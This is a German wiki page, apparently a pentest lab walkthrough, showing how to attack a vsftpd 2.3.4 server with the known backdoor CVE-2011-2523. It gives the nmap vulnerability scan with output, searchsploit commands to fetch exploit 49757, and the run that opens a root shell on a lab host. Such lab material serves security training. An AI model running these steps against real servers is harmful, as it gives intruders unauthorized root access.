Vsftp4-angriff

Aus xinux.net
Version vom 10. April 2024, 13:45 Uhr von Thomas.will (Diskussion | Beiträge) (→‎Exploit ausführen)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

Angreifer

Scan

  • nmap -sV --script vuln 10.0.10.105 -p 21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST
Nmap scan report for metaspoitable.hack.lab (10.0.10.105)
Host is up (0.00088s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
|     References:
|       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|       https://www.securityfocus.com/bid/48539
|_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
MAC Address: 0C:67:68:58:00:00 (Unknown)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds

Searchsploit

  • searchsploit vsftpd 2.3.4
  • searchsploit -m 49757 unix/remote/49757.py

Nach Exploit googlen

CVE-2011-2523 exploit-db

Exploit finden

Exploit ausführen

Öfter probieren

  • python3 49757.py 10.0.10.105
Success, shell opened
Send `exit` to quit shell
Abgerufen von „https://xinux.net/index.php?title=Vsftp4-angriff&oldid=52803